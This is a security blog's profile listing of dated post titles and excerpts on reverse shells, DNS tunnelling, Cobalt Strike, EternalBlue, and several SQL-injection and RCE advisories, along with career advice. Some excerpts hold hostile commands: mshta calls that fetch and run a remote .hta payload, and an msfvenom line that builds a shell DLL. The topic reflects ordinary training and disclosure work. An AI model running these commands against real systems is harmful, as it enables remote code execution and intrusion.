自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(175)
  • 收藏
  • 关注

原创 python反序列化基础

相应地,把“字符串 -> 对象”的过程称为“反序列化”。需要保存一个对象的时候,就把它序列化变成字符串;需要从字符串中提取一个对象的时候,就把它反序列化。各大语言都有序列化库,而很多时候,不恰当的反序列化会成为攻击的目标。如果我们要存储的内容只是一条字符串或是数字,那么我们只需要把它写进文件就行。本文融合了多个引用案例,融合在了一起,旨在说明反序列化个人认为是payload使用截断将执行调用的库和payload执行的代码,压入不同的位置,汇编运行的时候,直接执行了恶意代码。要把这样的dairy实例。

2024-07-19 10:24:48 173

原创 为什么有的人可以自学网络安全成才而你学废了

深入学习Web开发的基础知识,包括表单操作、Session/Cookie、JWT、LocalStorage等,了解它们的作用和基本原理。我们的目标不是成为程序员。在学习网络安全的过程中,遇到不会的再去补充,这样更有针对性,耗时也更少。Web基础部分学习HTML、CSS和JavaScript的开发和使用,特别是动手操作,熟悉JavaScript、Ajax和JQuery等技术。Linux部分的学习重点是掌握文本编辑、文件操作、网络配置、权限管理、磁盘管理、用户管理等基本命令,建立起对Linux系统的基本认知。

2024-07-17 10:19:33 431

原创 使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了。剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层。将这个文件上传至win10靶机运行。进入弹回来的shell。

2024-07-15 11:03:09 303

原创 网络安全领域红蓝对抗里关于红队全方位解析

无论你的目标是成为一名优秀的渗透测试工程师,还是矢志成为影响整个行业的安全专家,保持学习的热情、与时俱进的态度以及对安全的热爱,都是在这个领域取得成功的关键。对于初级红队成员来说,最重要的是保持学习的热情,不断提升自己的技能。提到红队,似乎行内都会默认为红队就是攻击队,而蓝队则是防守队,大部分文章也会把红队解释为是一种全范围的多层攻击模拟,我们平常沟通确实也会这样说,而事实上,到底什么才是红队?这个阶段的红队成员应该注重实战经验的积累,参与更多的实际项目,同时不断学习新的技术和攻击方法。

2024-07-11 14:13:07 989

原创 阿一课代表今日分享之使用dnscat2 进行dns隧道反弹shell(直连模式linux对linux)

Dns解析过程:系统发出dns解析之前会先看看本地是否保存了相关域名的解析,系统检测到hosts文件中没有响应的域名解析的时候会发送给本地dns解析服务器进行解析,解析之前会看看缓存中是否存在,如果没有,再将解析请求发给下一个dns服务器。gem install bundler 是一个在 Ruby 环境中使用的命令,用于安装 Bundler 这个 gem(gem 是 Ruby 的包管理器)Bundler 是一个帮助管理 Ruby 项目依赖的工具,它可以确保你的项目在不同的环境中使用相同版本的 gems。

2024-07-10 14:06:03 879

原创 阿一课代表随堂分享:红队反向代理之使用frp搭建反向代理

frp 是一个可用于内网穿透的高性能的反向代理应用,分为服务端frps和客户端frpc,支持 tcp, udp, http, https 协议。利用处于内网或防火墙后的机器,对外网环境提供 tcp 和 udp 服务,例如在家里通过 ssh 访问处于公司内网环境内的主机。4.外网用户连接到客户端指定的端口,服务端通过和客户端的连接将数据转发到客户端;2.客户端连接到服务端的主端口,同时告诉服务端要监听的端口和转发类型;1.服务端运行,监听一个主端口,等待客户端的连接;内网ip:10.10.10.201。

2024-07-09 10:51:37 465

原创 centos7.6 用yum安装java8

2.经过试验发现用yum install java-1.8.0-openjdk 时最后 /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-3.b13.el7_5.x86_6目录下只用一个jre文件(这跟平时有差异)最后用 yum -y remove java-1.8.0-openjdk 的方式卸载之后重新 yum -y install java-1.8.0-openjdk-devel.x86_64 才是正常。

2024-07-08 10:32:24 175

原创 网络安全领域的小众却前途无量的细分角色

工作形式无非就是需要了解各种智能设备的工作原理,找出可能存在的安全漏洞,并想办法修复。他们需要了解各种云平台(比如阿里云、腾讯云),知道如何正确配置安全选项,设置各种"安全门槛",不让坏人有机可乘。然而,这个行业远比表面看起来复杂,许多新兴的细分领域正在悄然兴起,未来发展前景不可限量。这个领域需要了解常见的医疗设备是怎么工作的,还要懂网络安全,以及医疗行业的一些特殊规定。几年前国外就发生过医院被勒索软件攻击的事件,结果医疗设备都不能正常工作,医院不得不取消了大量手术,造成了严重后果。具体如何没深入研究)

2024-07-08 10:22:28 353 1

原创 网络安全快不行了?现在入行网络安全会被卷死吗?

说了这么多,网络安全这圈子确实自带一股子“卷”的气息哈,毕竟技术始终都是要不停的学习提升进步的,要是一直抱着老黄历不放,还以为能靠过去的那一套混江湖,那在这个日新月异的时代,被淘汰出局简直就是板上钉钉的事儿。由此,我们不难理解,为何有些混子会滋生出逃避现实的心态,他们面对专业技能提升的挑战时,选择的不是迎难而上,而是试图通过散布焦虑情绪,来减少潜在的竞争者,以此为自己争取一丝苟延残喘的机会。有了前面两步的打底,是时候接触一些网络安全的技术了,刚刚开始这个阶段,仍然不要把自己圈起来只学某一个方向的技术。

2024-07-05 11:43:09 465

原创 渗透测试里的边界突破

【代码】渗透测试里的边界突破。

2024-07-04 10:46:29 307

原创 渗透新手福利来了:windows下载执行命令大全

参考:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/mshta http://webserver/payload.hta --->短域名:http://sina.lt/-->mshta http://t.cn/RYUQyF8。参考:https://github.com/3gstudent/Javascript-Backdoor。将以上保存为downfile.vbs。

2024-07-02 11:05:58 481

原创 阿一网络安全培训中心专门为你准备了一份WScan使用教程

因为Wscan不内置任何POC插件,但Wscan的prometheus插件引擎支持Nuclei、XRAY、Goby标准POC插件,与其他扫描器不同的是Wscan可以自定义POC深度,从而发现更多的Web安全问题。这时在wscan监听7777端口,浏览器的代理开启burp的代理,是8080端口,经过burp会转发到7777端口,wscan就会进行扫描了。在wscan_scan_result.html中可以详细的看到扫描的结果,可以查看各个漏洞的具体信息,payload 请求包 响应包等等。

2024-06-28 16:46:16 796

原创 Cobalt Strike DLL用于永恒之蓝注入

我们在对存在MS17010的漏洞主机进⾏DLL注⼊的时候,⼀般都是⽤的Meataploit的msf venom⽣成出来的,所以每次上线之 后基本都是要经过相对⽐较繁琐的操作之后转到Cobalt Strike去,这样就会显得⾮常⿇烦。转化命令:msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o shell.dll。生成文件后,打开msf,用命令将这个bin文件转化为dll文件。

2024-06-25 16:08:09 302

原创 一文带你全面详细了解安全运维

1、IP地址相关IP地址属于网络层地址,用于标识网络中的节点设备。IP地址由32bit构成,每8bit一组,共占用4个字节。IP地址由两部分组成,网络位和主机位。用于区分一个IP地址的网络位和主机位。子网掩码是用来判断任意两台计算机的IP地址是否属于同一子网络的根据。子网划分是为了解决网络IP不够用的情况。就是指同时向子网中的多台计算机发送消息,并且所有子网中的计算机都可以接收到发送方发来的消息。子网地址的范围就是网络位不变,主机位从全0到全1这个范围。

2024-06-21 11:23:00 1108

原创 阿一网络安全学院干货科普篇之应急响应【下】

概念:存在于web服务器端的脚本后门,以asp、php、jsp等网页文件形式存在的一种命令执行环境特性:与服务端正常脚本运行原理相同。可以绕过防火墙对主机进行操作。可进行文件上传、下载、命令执行等。webshell操作权限取决于解析器运行权限2、一句话木马概念:通过向服务端提交一句简短代码,配合本地客户端来实现webshell功能特性:变形多,易隐藏、难发现NTFS文件系统中文件可以存在多个数据流,其他文件流可以寄宿在主文件流中(流寄托于宿主)。

2024-06-18 16:47:37 753 2

原创 阿一网络安全学院干货科普篇之应急响应【上】

安全人员在遇到突发事件后所采取的措施和行动。发生在计算机系统或网络上威胁安全的事件。如黑客入侵、信息窃取等。信息安全生命周期的必要组成部分,这个生命周期包括:对策、检测和响应。运维人员无法迅速处理安全事件时,需要第三方厂商提供一种能发现并解决问题的有效服务手段。控制影响范围确保业务正常运转、还原攻击场景、找到问题根源、最后追溯攻击源。以最快速度恢复系统的保密性、完整性和可用性,阻止和减小安全事件带来的影响。积极预防、及时发现、快速反应、确保恢复。

2024-06-17 14:09:26 1027

原创 阿一网络安全学院来向你科普关于企业安全服务

1、可管理安全服务在提供传统安全产品及安全服务的基础上,逐步开展安全运营,用开放的安全平台连接卓越的产品和服务,洞察安全态势,为企业级用户提供小时级的闭环安全保障。2、安全咨询服务为客户进行全方位风险评估,帮助客户掌握安全现状与目标之间的差距、设计及落实安全体系、满足各种合规性要求、采取措施降低安全风险,进而提高安全管理实效、获取信息安全管理体系认证等。3、安全评估服务。

2024-06-11 14:05:12 882

原创 阿一网络安全培训中心带你回顾Windos/Linux 反弹 shell

最近都在打内网,就从最基础的知识开始学习、整理。

2024-06-05 15:36:25 867

原创 阿一网络安全学院课代表教你如何快速隐藏CS

原版的CobaltStrike存在某些未授权访问漏洞,以及特征太过于明显,以至于很容易被C2检测器发现。本文记录了一些隐藏特征的方法,这些方法不涉及更改cs底层jar文件,适合小白(指自己)快速部署。本文目标:从流量、端口、访问页面等方面尽可能隐藏cs流量,运用cdn实现IP隐匿,同时实现linuxC2通讯功能。

2024-05-31 11:17:12 714

原创 Debian下配置防火墙iptables

建议将其保存为/etc/init.d/iptables,然后chmod +x /etc/init.d/iptables 添加运行权限。iptables -A INPUT -j REJECT #(注意:如果22端口未加入允许规则,SSH链接会直接断开。1、将iptables配置保存到/etc/iptables,这个文件名可以自己定义,与下面的配置一致即可。若要停止iptables,iptables -F清空所有配置效果等同于停止。#配置,禁止进,允许出,允许回环网卡。#禁止其他未允许的规则访问。

2024-05-27 13:58:58 1103

原创 在某云服务器上搭建公网kali linux2.0

注意:If=你下载的kali的名称dd bs=4M if=kali-linux-2020.3-installer-amd64.iso of=/dev/vdb。保存后继续设置root密码,输入sudo passwd root设置root密码sudo passwd root。boot之后进入 kali的安装界面,hd1对应的是我的vdb数据盘不是系统盘哈!保存后执行grub2-mkconfig -o /boot/grub2/grub.cfg。慢慢慢~注意注意注意 下图 安装完成后 选择返回 返回 返回!

2024-05-21 16:04:16 707

原创 易宝OA-ExecuteQueryForDataSetBinary处sql注入

易宝OA的/api/system/ExecuteQueryForDataSetBinary处存在sql注入漏洞。

2024-05-14 11:46:43 324

原创 海康运行管理中心 RCE

海康运行管理中心系统使用低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限。PS:本文首发自公众号【长歌安全】

2024-05-09 10:20:59 347

原创 D-Link设备远程命令执行漏洞(CVE-2024-3273)

D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞。

2024-04-30 09:46:41 325 4

原创 通天星CMSV6 车载视频监控平台 信息泄露漏

通天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞。

2024-04-23 16:42:21 389

原创 为什么黑客领域全是男生?

其次,在黑客领域中,工作或者做项目都需要高水平的技术知识和技能,学习这些技能需要花费大量的时间和精力。确实,在计算机早期发展阶段,计算机编程工作主要是以男生为主,而且在很长的一段时间里面,这个领域基本都没有女性的出现。然后上来就是一波言论浮夸的输出,把一些很基础很浅显的技术点拆解出来,让小白快速上手,误导新手,让他们以为网络安全就这么回事儿,可一道真正实操,都是半瓶水晃荡,啥也不会。总之,黑客领域中的男生确实是占了大多数,但是原因也是复杂且多方面的,包括历史文化、技能兴趣等等。,被誉为“谷歌的镇长”。

2024-04-19 09:11:07 749

原创 逍遥模拟器面具保姆级安装教程

最近在网上看了很多模拟器的面具安装教程,也找了很多视频,发现很多都是夜神,雷电模拟器的教程,就算有的标题写的是逍遥模拟器的面具安装,点进去一看,还是雷电或者夜神的,这让想一心找逍遥模拟器的教程的我非常苦恼,于是,我只能自己试了,,,(强迫症,一心只想搞逍遥,不为别的,因为这模拟器名字起的好,很符合我的个性)接下来进入面具app,点击安装-->修补镜像中的vbmeta-->下一步-->安装至系统分区-->开始,接下来手动重启,不要点击app界面的重启,容易卡死,亲身经历。

2024-04-11 17:19:59 879

原创 【0day】号卡sql注入

号卡系统一键即可便捷快速的为您自己打造一个独立的属于你的号卡分销商城。此系统某接口存在SQL注入漏洞。

2024-04-02 16:13:02 138

原创 普通人掌握黑客技术有多爽?

虽然普通人成为黑客是非常爽的,不仅能够拥有技术、还能够拥有一份体面高薪又稳定的工作,但是能不能成为一名黑客还是要取决于他们的兴趣、学习能力和投入的时间。如果你富有正义感,也可以像有些大佬一样渗透进杀猪盘和BC等非法网站,收集到关键证据交给警察叔叔,帮助更多人意识到并走出骗局,为社会贡献自己的力量。作为一名普通人,没有过硬的家庭背景,没有高学历,也没有一张漂亮的脸蛋,掌握黑客技术之后,完全可以找到一份月薪8-10K的工作,并且工作1-2年之后薪资更是能够达到过万的水平。就算你是零基础,也可以学成黑客高手。

2024-04-02 16:10:34 396

原创 白盒变黑盒。。。——一套漏洞百出的源码

无聊的时候翻公众号看见一位老哥审了一套开源的php源码,于是,咱也下了一套并搭建了起来。打开小皮根目录,将源码拖入小皮默认网站根目录,解压,并且修改小皮默认网站根目录为源码系统的根路径,(不修改的话,即使访问路径正确,网站模块功能的解析也会报错)此外还有一个很重要的接口,在功能点基本点完后,翻找历史记录包的时候,发现一个将所有用户名和密码泄露的接口,密码通过MD5加密,与登录站点的加密方式一样。最后确定,几乎全站都是未授权+sqli,而sqli的主要原因又是未授权,,,,总之,随便抠一个接口就是。

2024-03-28 10:28:24 801

原创 JeePlus低代码开发平台存在SQL注入漏洞

JeePlus低代码开发平台存在SQL注入漏洞。

2024-03-20 17:39:41 258

转载 推荐几款渗透测试常用的脚本

利用搜索引擎发现子域(目前有15个模块:ask, bing_api, fofa_api, shodan_api, yahoo, baidu, duckduckgo, google, so, yandex, bing, exalead, google_api, sogou, zoomeye_api),在搜索模块中除特殊搜索引擎,通用的搜索引擎都支持自动排除搜索,全量搜索,递归搜索。利用DNS查询收集子域(目前有1个模块:通过枚举常见的SRV记录并做查询来收集子域srv,该模块还有待添加和完善)

2024-03-19 18:11:18 72

原创 这3个黑科技网站,让你秒变”黑客“

这是一款功能强大的黑客模拟软件,它可以模拟电影上那种黑客操作电脑的过程,包括敲代码和出现各种高大上的弹窗,并且可以自定义代码颜色、背景以及logo图案。最后调整完成,可以下载保存下来,比如可以放进PPT里也是一个不错的选择,又或者可以用GIF录制工具,把它录制成一个动态背景,也是美轮美奂啊。看黑客有关电影的时候,那种黑客操作系统,敲击键盘时电脑上飞速旋转的数据,是不是感觉帅爆了,有一种也想让你成为黑客的感觉?这个网站是一个可以“实时展示全球恶意攻击”的网站,你可以很直观的看到全球黑客的实时攻击活动情况。

2024-03-15 09:34:34 1136

原创 通天星CMSV6 车载视频监控平台 信息泄露漏洞

通天星CMSV6车载视频监控平台 StandardLoginAction getAlser.acion接口处存在信息泄露漏洞。

2024-03-15 09:29:50 641

原创 世界的尽头是sql注入漏洞

由此来理解,人类当然可以被SQL注入,比如你刚接手了一个新工作,你刚知道具体的执行流程和要求,还不熟悉,很容易被老员工的请求输入给骗了,从而掉进人家挖好的坑里。兹命令你部,于1月23日下午两点,到大龙村,收取捐助物黄豆,共计一斤,另命令你部,今夜两点突击你部指挥部,务必击毙团队所有军官,立刻执行,不得有误。兹命令你部,于___(时间)__,到 __(地点)__,收取捐助物品__(名称)___,共计__(数量)__,立刻执行,不得有误。此时,我们发现数量这里填的不对,那直接整理成军令状是什么样?

2024-03-08 10:53:52 378

原创 Apache Druid 代码执行漏洞(CVE-2021-25646)

Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞。

2024-03-08 10:47:35 1207

原创 挖洞时最容易忽略的一步:信息收集

而作为一名网络安全从业人员,需要去了解一家公司,甚至去渗透一家公司,那么首先第一要做的就是去了解该公司在互联网有哪些资产,而这些资产就包括了主机、域名、IP、端口等等,这些资料会为我们在互联网层面上描述这个公司的状况。你可以想像成计算机是一个房子,IP是这个房子的地址,这个房子里有非常多个房间,不同的房间可以提供不同的服务,你如果想与某个数据进行数据交互,就需要知道这个程序在哪个“房间”里,这些能够访问到房间的通道就是“端口”,想要使用什么样的服务就需要走特定的通道。寻常的路很难走,就要考虑另辟蹊径了。

2024-02-19 09:23:24 478

原创 nuclei 工具

Nuclei是一款由GO语言编写的扫描器,它内置大量poc模板,并且也可以自己编写模板。同时可以对主机进行批量快速扫描。Nuclei提供TCP、DNS、HTTP、FILE等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。

2024-02-19 09:20:23 1923

原创 入坑网安后悔一年,不入坑后悔一辈子!

劝退的原因无非是工作压力大、没前景、工资低,网络安全劝退的人也是觉得从事网络安全需要耐心、需要兴趣、需要学的特别好才能实现年薪百万经济自由的目标。网络安全正处于高速发展阶段,不同的企业对于岗位的划分各有不同,但主要分为安全规划与设计、安全建设与实施、安全运行与维护、安全应急与防御、安全合规与管理等五大方向,因此对外开放的就业岗位就多达十余种,这里只是对一些常见的重点岗位进行了总结。有些的大厂,例如奇安信,会把渗透岗位分为红蓝两方,对候选人的技术要求比较高,大部分刚入行的新人,也将渗透岗作为后期发展的目标。

2024-02-14 09:27:08 400

原创 为什么有人不推荐选择网络安全行业?

展望未来三年,网络安全产业发展顶层设计更加完善,促进行业发展的政策基础愈加巩固,数字经济加速发展等正向网络安全产业注入新动力,产业结构调整逐步深化,更多网络安全板块将涌现出来,预计网络安全产业将保持10%以上的增速,到2025年市场规模将超过800亿元。目前大学的教育体系,课程设置与现实情况有点出入,让学校与企业无法形成有效联通,课程设置不合理,师资力量没有匹配,现在大学很多专业师资力量不够完善,毕业后能力不强,无法达到企业的应聘标准,无奈只能选择其他行业。为什么很多人毕业后不选择网络安全方面呢?

2024-02-09 10:08:22 910

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除